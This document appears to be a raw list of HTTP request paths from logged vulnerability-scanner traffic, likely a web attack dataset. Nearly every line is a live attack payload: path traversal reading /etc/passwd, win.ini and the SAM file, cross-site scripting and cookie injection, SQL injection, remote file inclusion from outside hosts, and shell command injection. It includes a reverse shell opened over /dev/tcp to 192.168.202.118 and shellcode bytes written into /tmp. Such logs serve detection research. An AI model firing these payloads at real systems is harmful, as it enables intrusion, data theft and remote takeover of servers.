/note.txt?f_notini=&t_note=&nomentreprise=blah&filenote=../../winnt/win.ini
/en-us/account/detail.asp?nchannel='1
/javascript/resin.exe
/javascript/left.exe
/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt??
/scripts/apgafvcxoeeh.php
/scripts-df/
/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/2aibfaczmac8?
/cacti/texis.exe/?-dump
/imprimer.asp?no=/....../boot.ini|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'.
/scripts/login.jsp?lang=en&cntry=
/jnv890lt.jspa?<script>cross_site_scripting.nasl</script>
/javascript/show_post.exe
/examples/servlets/servlet/shoutbox.php?conf=../../../../../../../../etc/passwd
/scripts/4rzefq7dsowk.sh
/examples/servlets/servlet/demos/demo.browse.php?filename=/etc/passwd
/en-us/i686v90l.mscgi?<script>document.cookie="testfutf=1550;"</script>
/path_script/createurl.php?formurl=http://192.168.202.118:8080/iroy1gvqrrqu?
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+777+/tmp/tvwonjvwux.sh')."]=1
/tuwjta1w.fts?<meta http-equiv=set-cookie content="testpokn=7494">
/i686v90l.jsp?<meta http-equiv=set-cookie content="testfutf=1550">
/manager/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/examples/jsp/cal/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd
/index.php?version="><script>alert('force_xss')</script>
/help.php?q=&ver;>q15387485&rem;
/towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/moclyxlwqyfjnp?
/main.php?stuff=ping;-w;7000;-n;1;4.3.2.1&rem;
/top.php?stuff=@'
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/javascript/.htpasswd.sfish/'`true`'
/scripts/mlog.html?screen=/etc/passwd
/cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00
/rpxyx07v.exe?<script>document.cookie="testbnli=1975;"</script>
/examples/servlets/servlet/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00
/recordings/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>
/jujgxwav.fts?<meta http-equiv=set-cookie content="testknim=9383">
/examples/jsp/sessions/hw3.cgi?daysonly=0).system('id').(
/ldap/cgi-bin/ldacgi.exe?action=substitute&template=../../../../../boot.ini&sub=localepath&localepath=enus1252
/javascript/share.exe
/qczkquis.kspx?<meta http-equiv=set-cookie content="testkwlg=5591">
/manager/index.php?chemin=../../../../../../..//etc
/student.asp?msg=<script>alert("411715577541");</script>
/jnt3f86c.idc?<script>document.cookie="testcmax=9270;"</script>
/fmnveedu.exe?<script>document.cookie="testgfbr=7014;"</script>
/3m5knyc4.idc?<script>document.cookie="testbgqj=6434;"</script>
/examples/jsp/error/admin/top.php?admindir=/etc/passwd\x00
/../../../../../../../../../boot.ini
/en-us/account/search.pl?form=../../../../../../etc/passwd\x00
/rmscript/
/en-us/9kr0ih0v.cfc?<meta http-equiv=set-cookie content="testzgnm=1183">
/en-us/account/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/phpmyadmin/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>
/vtc flash actionscript 2/
/examples/jsp/cal/zpanel.php?page=/etc/passwd\x00
/main.php?stuff="&sleep\x098\x09#
/htpasswd
/shop/member_html.cgi?file=|cat /etc/passwd|
/javascript/membership.exe
/examples/jsp/jsp2/jspx/way-board/way-board.cgi?db=/etc/passwd\x00
/javascript/nav.exe
/examples/jsp/checkbox/index.php?search=<script>foo</script>
/cgibin/cgi-test.exe
/en-us/account/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00
/scs86g1p.php3?<script>document.cookie="testquyx=2820;"</script>
/bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/examples/jsp/cal/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00
/qb2xy9aw.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/scripts/shop.plx
/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/2aibfaczmac8?
/examples/jsp/checkbox/sendcard.php?view=1&id='sendcard_sql.nasl
/scripts/vvh_tajyleqq.php3
/hjdzm96v.pl?<meta http-equiv=set-cookie content="testbyqe=7474">
/r3le3om5.nsf?<script>cross_site_scripting.nasl</script>
/scripts/qg9h0c0svvat.asp
/examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00
/help.php?q="&sleep 7 #
/phpmyadmin/story.pl?next=../../../../../etc/passwd\x00
/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/moclyxlwqyfjnp?
/manager/index.php?post=../config/password
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/lknajdyaas;"
/j2kdmfw4.jspa?<script>cross_site_scripting.nasl</script>
/javascript/img.exe
/top.php?stuff='&del\x09q46445966\x09#
/javascript/bash.exe
/cgi/msmmask.exe?mask=/junk334
//</p><body><script src=http://www.example.com/test?rnd=q56966629></script><p>
/quagynka.jspa?<script>cross_site_scripting.nasl</script>
/recordings/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
<meta http-equiv=set-cookie content="testvqcy=252">
/en-us/h5sc3gxy.mscgi?<script>cross_site_scripting.nasl</script>
/scripts/sendtemp.pl?templ=../../../../../etc/passwd
/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/en-us/account/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00
/vmi8bb12.cfm?<script>document.cookie="testlerc=2575;"</script>
/oie504mr.php?<meta http-equiv=set-cookie content="testtpby=7052">
/examples/jsp/checkbox/file.php?path=/etc/passwd\x00
/scripts/callboth.php?seq=654321&out=123456&in=1331908731@nessus\x0d\x0aasteridex_in_code_injection.nasl
/1qwv2p5p.x?<meta http-equiv=set-cookie content="testvqcy=252">
/hrttz9fj.kspx?<script>document.cookie="testtbjy=7334;"</script>
/phpmyadmin/shoutbox.php?conf=../../../../../../../../etc/passwd
/scripts/disp_album.php?id_album=0+or+1=1
/javascript/document.as
/g3w7y7u5.cfm?<script>document.cookie="testbfpq=3326;"</script>
/examples/servlets/servlet/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/news/include/createdb.php?langfile;=http://192.168.202.118:8080/moclyxlwqyfjnp??
/dagent/checkprofile.asp?agentid=11111'plus_agentid_sql_injection.nasl
/ddoworrl.php3?<meta http-equiv=set-cookie content="testvlau=8517">
/eg2u8pbv.mscgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin//.../.../.../.../.../.../.../.../windows/win.ini
/scripts/doc/index.php?s=/etc/passwd\x00
/scripts/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/help.php?q=';uname\x09>q69988199\x09#
/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --
/main.php?stuff="&ver\x0b>q12538123&rem\x0b
/scripts/2sfdqydfaknx.php
/freescripts/
/cgi-bin/detail.asp?nchannel='1
/nyvbv05h.jsp?<meta http-equiv=set-cookie content="testftxz=5980">
/braincodec.121.exe/
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "h\0300\0250\0312fh\0002\0000\0334\0047\0211\0340j\0020pr" >> /tmp/yzicxmyifv0;echo|awstats634921.txt
/cgi-bin/search.php?submit=true&search=');
/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\x00
/fmnveedu.cfm?<script>document.cookie="testgfbr=7014;"</script>
/javascript/unregister.exe
/index.php?news7["functions"]=http://192.168.202.96:8080/4dckqcc0acprbz?
/buck_o'neil/
/6wb70v0b.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+50+45+00+00+4c+01+03+00+00+00+00+00+00+00+00+00+00+00+00++>>ctdn
/examples/servlets/servlet/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00
/<script>alert('vulnerable')</script>.shtm
/en-us/esmozg5d.jspa?<script>cross_site_scripting.nasl</script>
/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,169866100570,4,5,6,7,8,9,10,11--
/cgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
/scripts/sawmill?rfcf+"sawmillinfo/sawmillpassword"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/index.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt?
/examples/jsp/jsp2/jspx/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/<script>cross_site_scripting.nasl</script>.jsp
/ywaxntrx.mscgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/using logon scripts figure 81102332930350/
/melscript/
/examples/jsp/colors/dsweb/services/user-1"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>
/main.php?logout="|ping,-w,8000,-n,1,4.3.2.1|rem,
/o6ebbirj.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/help.php?q="&ver&rem;
/gvx7m5ti.php?<script>document.cookie="testwldz=3506;"</script>
/top.php?stuff=\x0duname\x09>q27119174\x09#
/javascript/ru.exe
/en-us/account/help/index.php?help_file=../../../../../../../../../../../etc/passwd
/en-us/manager/search/apps/local?msgid=4457640.337874593665&ns=search&redirecting=true
/scripts/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx
/main.php?logout='\x0arm q82997141 #
/main.php?logout='\x0ddel q29695698 #
/cgi-bin/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html
/1r8cfrlf.x?<meta http-equiv=set-cookie content="testydan=5106">
/main.php?logout="&uname\x09#
/en-us/dda2qr7j.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/exchange/..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\+/og
/javascript/crontabs.exe
/help.php?q='|sleep\x0910\x09#
/l4fz1dqw.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/qbch5ojumj32.sh
/help.php?q='\x0ddel q95327467 #
/scripting2weblogscom/
/ap58k3ci.jspa?<script>cross_site_scripting.nasl</script>
/666\x0a\x0a<script>alert('vulnerable');</script>666.jsp
/main.php?stuff='\x0auname >q75819271 #
/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/zz5thkvtmlgl?
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
/javascript/include.exe
/cgi-bin/main.cgi?board=free_board&command=down_load&filenikto=../../../../../../../../../../etc/passwd
/t3af3tdz.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgibin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332008331
/help.php?q="\x0ddel q43695626 #
/yver8r9o.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/mv8wxfy9.idc?<script>document.cookie="testrhbc=8184;"</script>
/manager/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h
/top.php?stuff='\x0duname\x09#
/examples/servlets/servlet/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd
/main.php?stuff="\x0dsleep\x098\x09#
/jnt3f86c.asp?<script>document.cookie="testcmax=9270;"</script>
/zqqemp6j.asp?<script>cross_site_scripting.nasl</script>
/<script>document.cookie="testbfpq=3326;"</script>
/examples/servlets/servlet/config.php?path[docroot]=/etc/passwd\x00
/index.php?cat='
/main.php?logout="ping -w 8000 -n 1 4.3.2.1|rem
/scriptpad/
/jackrabbit/search.jsp?q=%"<script>alert(1331909235)</script>
/javascript/cms.exe
/?<script>document.cookie="testbyqe=7474;"</script>
/gulliver's_travels/
/search.php?config["sipssys"]=http://192.168.202.118:8080/tzhfyzkbomspvm?
/examples/jsp/jsp2/el/edit.jsp?page=user&editor=../../../install
/yef5f3d5.mscgi?<script>document.cookie="testcrcv=6167;"</script>
/xfkun1ku.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/documentation.html?phpmyadmin=<?php passthru('id'); die; ?>
/examples/jsp/colors/nslookup.cgi?query=localhost;id&type=any&ns=
/j4drbkil.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgi-915/.passwd
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/yef5f3d5.pl?<meta http-equiv=set-cookie content="testcrcv=6167">
/manager/misc/audio.php?recording=../version.inc
/javascript/finance.exe
/egaet53a.php?<script>cross_site_scripting.nasl</script>
/subscriptions.tmp
/javascript/broken.exe
/javascript/document.properties
/examples/jsp/checkbox/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00
/dslpwt15.pl?<script>document.cookie="testtkio=5454;"</script>
/javascript/.passwd.mdb
/b1q8bywu.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/subscription_signup/
/examples/jsp/cal/faq.php?action=&type=view&s=&id=-1' union select 0,576895199,0,0,0,0,0--
/yef5f3d5.html?<script>document.cookie="testcrcv=6167;"</script>
/help.php?q=;rm q88998669 #
/webcgi/texis.exe/junk
/scripts/onwkbtts3uj1.html
/examples/jsp/jsp2/jspx/file.php?path=/etc/passwd\x00
/pii.exe
/main.php?frm_daynight=day&frm_passwd=q16254778&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --
/main.php?logout=&uname >q77917557 #
/zuihld5m.kspx?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/snpfiltered.pl?t=c&u=<script>foo</script>
/ttxssh2_212/
/main.php?stuff="\x0asleep 7 #
/examples/jsp/cal/sawmill6cl.exe?ho+{complete_version}
/gy23xnjq.dll?<script>cross_site_scripting.nasl</script>
http://xxxxxxxxxxx.:80/<script>alert('vulnerable')</script>.jsp
/manager/index.php?album=../../../../../../../../../../etc/passwd\x00
/en-us/33y9gcqq.html?<script>document.cookie="testnvxc=4301;"</script>
/phpmyadmin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 --
/tuwjta1w.nsf?<script>document.cookie="testpokn=7494;"</script>
/top.php?stuff=\x0duname >q78785137 #
/help.php?q=&ping;-w;9000;-n;1;4.3.2.1&rem;
/javascript/htpasswd.asmx
/yver8r9o.cgi?<script>cross_site_scripting.nasl</script>
/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,473248912,0,0,0,0,0--
/scripts/bveygnpo6hkw.inc
/cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd
/cgi-bin/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/l4fz1dqw.jspa?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 --
/recordings/sendtemp.pl?templ=../../../../../etc/passwd
/j4rdyhw8.htm?<meta http-equiv=set-cookie content="testrluj=1420">
/scriptinga/
/examples/jsp/sessions/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/javascript/web-beans.exe
/phpmyadmin//..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c/windows/win.ini
/dda2qr7j.do?<script>cross_site_scripting.nasl</script>
/bn857frh.idc?<script>cross_site_scripting.nasl</script>
/javascript/saml.exe
/scripts/.passwd
/iissamples/sdk/asp/docs/winmsdp.exe
/en-us/<script>document.cookie="testzgnm=1183;"</script>
/tamambolo_scriptautomatikpourprocdump321-5/
/javascript/6.exe
/scripts/buoalakxhatu.php
/d7ktpmcq.exe?<script>cross_site_scripting.nasl</script>
<meta http-equiv=set-cookie content="testtrlh=3672">
/main.php?stuff="ping,-w,11000,-n,1,1.2.3.4|rem,
/scripts/docman/new.php
/msadc/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/fpnpp5zg.aspx?<script>document.cookie="testyias=101;"</script>
/scripts/udblphlq4nln.asp
/tuwjta1w.do?<meta http-equiv=set-cookie content="testpokn=7494">
/webcgi/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
/examples/jsp/jsp2/jspx/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_na5kufvl]));die;/*
/main.php?stuff="&rm\x09q48424932&rem\x09
/running scripts at login/
/recordings/main.php?g2_itemid=../../../../../license\x00
/ddoworrl.cfc?<meta http-equiv=set-cookie content="testvlau=8517">
/main.php?logout='uname\x09#
/qhvu0pdg.php3?<meta http-equiv=set-cookie content="testchuc=2100">
/examples/jsp/jsp2/jspx/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>
/scripts/lpzj75ztw9lb.cfm
/l13b77e5.dll?<script>document.cookie="testjvvf=7721;"</script>
/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_server[http_nessus_5r89tpqc]));die;/*
/hrttz9fj.pl?<meta http-equiv=set-cookie content="testtbjy=7334">
/9o6g5vkn.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/lsoix5h3.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/top.php?stuff="|sleep 8 #
/nsn/..\util/rd.bas
/main.php?stuff="\x0adel\x09q72429699\x09#
/cim-description/
/en-us/w4996nr0.dll?<script>document.cookie="testttvs=7163;"</script>
/hipkz026.cgi?<script>document.cookie="testyrbs=2855;"</script>
/examples/jsp/jsp2/el/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc
/javascript/folder.exe
/cgi-bin/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
/icon_transcript/
/scripts/loadpage.cgi
/en-us/odzk29aa.pl?<meta http-equiv=set-cookie content="testtfvh=2141">
/en-us/dda2qr7j.x?<script>cross_site_scripting.nasl</script>
/cacti/login.php?user="><script>alert('pubcookie_xss.nasl');</script>
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/ghl9il?
/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61712365427.copy
/javascript/dealer.exe
/6dlc2zm9.fts?<meta http-equiv=set-cookie content="testqpux=4016">
/subscriptions.dat
/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/ghl9il?
/2 girls with dildo's 3/
/javascript/umts.exe
//........................................................................../../../../../../../../windows/win.ini
/rpxyx07v.html?<script>document.cookie="testbnli=1975;"</script>
/en-us/h5sc3gxy.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/num/login.php?course="><script>alert(atutor_xss.nasl)</script>
/vwmg565s.htm?<script>cross_site_scripting.nasl</script>
/o35zot2r.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/"mary cheney"/
/javascript/.passwd.error
/recordings/texis.exe/?-dump
/jw64yq8u.cfc?<script>document.cookie="testylfu=1313;"</script>
/examples/jsp/jsp2/el/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
/en-us/account/shopexd.asp?catalogid='42
/x2gyorli.fts?<meta http-equiv=set-cookie content="testwhac=3130">
/_vti_bin/..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\+/og
/main.php?logout='&rm\x09q79227952\x09#
/fc9t54l7.kspx?<meta http-equiv=set-cookie content="testggad=2000">
/javascript/publication.exe
/mv8wxfy9.dll?<meta http-equiv=set-cookie content="testrhbc=8184">
/byrg33fw.idc?<meta http-equiv=set-cookie content="testexuu=5340">
/javascript/dropped.exe
/clk;58165316;7163019;j/
/<script>cross_site_scripting.nasl</script>.x
/en-us/h5sc3gxy.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/0w155a7c.htm?<script>cross_site_scripting.nasl</script>
/cgi-bin/starnet/addons/slideshow_full.php?album_name='1737115412
/j4rdyhw8.x?<script>document.cookie="testrluj=1420;"</script>
/yver8r9o.htm?<script>cross_site_scripting.nasl</script>
/index.php?download=/etc/passwd
/msadc/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og
/javascript/p.exe
/j734qobz.x?<script>cross_site_scripting.nasl</script>
/fc9t54l7.dll?<meta http-equiv=set-cookie content="testggad=2000">
/javascript/pfx.exe
/main.php?stuff='\x0duname\x09>q27918964\x09#
/subscriptions2/
/scripts/1332010197-ror_session_fixation.nasl
/0w155a7c.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/page.exe
/top.php?stuff="\x0adel q36232773 #
/scripts/mj_wwwusr
/examples/jsp/colors/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/zuihld5m.php3?<script>cross_site_scripting.nasl</script>
/j4rdyhw8.do?<script>document.cookie="testrluj=1420;"</script>
/_mem_bin/..\xc0/..\xc0/..\xc0/..\xc0/..\xc0/../winnt/system32/cmd.exe?/c+dir+c:\+/og
/manager/showproduct.php?product=1'
/7uz3ok60.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/b4vng02k.html?<script>document.cookie="testtrlh=3672;"</script>
/static//.../.../.../.../.../.../.../.../etc/passwd
/examples/servlets/servlet/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo
/examples/jsp/jsp2/el/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl
/cgi-bin/survey.inc.php?path=/etc/passwd\x00
/examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/twiki/bin/view/main/twikiusers?rev=3739 `0<&40-;exec 40<>/dev/tcp/192.168.202.118/9893;sh <&40 >&40 2>&40`#
/cgi-915/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/cgi-bin/technote/main.cgi?board=free_board&command=down_load&filenikto=/../../../../../../../../../../etc/passwd
/ybz5rz7a.fts?<script>document.cookie="testsbvw=6289;"</script>
/scripts/test-cgi
/javascript/information.exe
/javascript/j2me.exe
/main.php?stuff='&sleep 10 #
/examples/jsp/jsp2/jspx/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/moclyxlwqyfjnp??
/main.php?stuff="del q49686563 #
/manager/doc/index.php?s=/etc/passwd\x00
/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 2080375299--
/cgi-bin/js/scripts.php?load=/etc/passwd\x00
/cgi-perl/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
<script>document.cookie="testiklc=904;"</script>
/javascript/msie.exe
/en-us/s7qus4g3.nsf?<script>cross_site_scripting.nasl</script>
/quagynka.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/gy23xnjq.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/checkbox/admin/addentry.php?phpbb_root_path=/etc/passwd\x00
/cgi-bin/index.php?id=s1_eihg6e1'
/3m5knyc4.htm?<script>document.cookie="testbgqj=6434;"</script>
/javascript/torrent.exe
/examples/jsp/jsp2/el/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js
/m2fpztty.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?logout="ping -w 7000 -n 1 1.2.3.4&rem
/main.php?logout="&rm\x0cq71167917&rem\x0c
/cgi-915/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/options.exe
/examples/jsp/cal/ftp/ftp.pl?dir=../../../../../../etc
/search/show.pl?url=file:/etc/passwd
/top.php?stuff="ver,>q89398857&rem,
/b1q8bywu.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/ybz5rz7a.jsp?<meta http-equiv=set-cookie content="testsbvw=6289">
/help.php?q=";uname #
/scripts/athenareg.php?pass= ;id
/scriptpath/index.php?page=http://192.168.202.96:8080/ipb5ri?
/examples/jsp/jsp2/jspx/a1disp3.cgi?/../../../../../../etc/passwd
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ybuoueddeq.sh+>+/dev/null+&'); function v
/main.php?logout="&ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c
//../../../../../../../../windows/win.ini\x00
/javascript/htpasswd.cnf
/fcgi-bin/ion-p?page=../../../../../etc/passwd
/recordings/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/phpmyadmin/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/examples/jsp/colors/viewpage.php?file=/etc/passwd
/cgi-bin/minis.php?month=../../../../../../etc/passwd
/webmathematica/msp?mspstoreid=../../../../../../../../../../etc/passwd&mspstoretype=image/gif
/help.php?q="\x0duname\x09>q99489698\x09#
/scripts/vhost.php?action=logout&time=1331904150
/main.php?stuff="&uname #
/main.php?stuff="&uname\x09>q61351616\x09#
/subscriptions.manifest
/examples/jsp/sessions/include/theme.inc.php?fullpath=/etc/passwd\x00
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/cf5_upload.cfm?command=fileupload&type=file¤tfolder=/
/_scripts/
/index.php?op=default&date=200607' union select 1,379183911,1,1,1,1,1,1,1,1--&blogid=1
/scripts/rih28haesl0j.shtml
/examples/jsp/jsp2/jspxmultihtml.pl?multi=/etc/passwd\x00html
/help.php?q="&del\x09q13287114\x09#
/ddoworrl.jsp?<meta http-equiv=set-cookie content="testvlau=8517">
/hrttz9fj.dll?<meta http-equiv=set-cookie content="testtbjy=7334">
/cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
/examples/jsp/num/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00
/cgi-915/ion-p.exe?page=c:\winnt\repair\sam
/ap58k3ci.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/lenya.exe
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/phpmyadmin/documentation.html?phpmyadmin='"'");|]*{%0d%0a<%00>
/redcell/phonehome_script.exe
/en-us/account/embed/day.php?path=/etc/passwd\x00
ftp://192.168.22.202/*<apache_mod_proxy_ftp_glob_xss.nasl>
/scripts/t769qwej0llr.inc
/javascript/sync.exe
/examples/servlets/servlet/docs.php?doc=../jpgraph-1.12.1/docs/index
/javascript/aa.exe
/subscriptions.gz
/qb2xy9aw.kspx?<script>cross_site_scripting.nasl</script>
/5o9zq43e.pl?<script>cross_site_scripting.nasl</script>
/top.php?stuff=';del q64815511 #
/main.php?stuff='\x0drm q97623189 #
/examples/jsp/checkbox/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/miz4r5hz.html?<script>document.cookie="testviqu=1270;"</script>
/scs86g1p.exe?<meta http-equiv=set-cookie content="testquyx=2820">
/cgi-exe/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/ezprescription/
/top.php?stuff='\x0ddel\x09q88128927\x09#
/nuh3zirz.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/qb2xy9aw.mscgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/cal/calendar.php?month=' union select 1,1,'1331904431','calendarix_month_sql_injection.nasl',1 #
/cacti/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00
/top.php?stuff="&ping\x09-w\x097000\x09-n\x091\x094.3.2.1&rem\x09
/scripts/php.cgi?/etc/passwd
/jujgxwav.jsp?<script>document.cookie="testknim=9383;"</script>
/recordings/man-cgi?section=0&topic=ls;id
/scripts/cgi-lib.pl
/scripts/shared/help.php?page=../../../../../../../../../../etc/passwd\x00
/xfkun1ku.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/control.exe
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435
/recordings/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00
/i2n4v4rl.jspa?<script>cross_site_scripting.nasl</script>
/gy23xnjq.jsp?<script>cross_site_scripting.nasl</script>
/8x6w469u.pl?<meta http-equiv=set-cookie content="testgfjr=1286">
/javascript/jsf.exe
/examples/jsp/error/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'
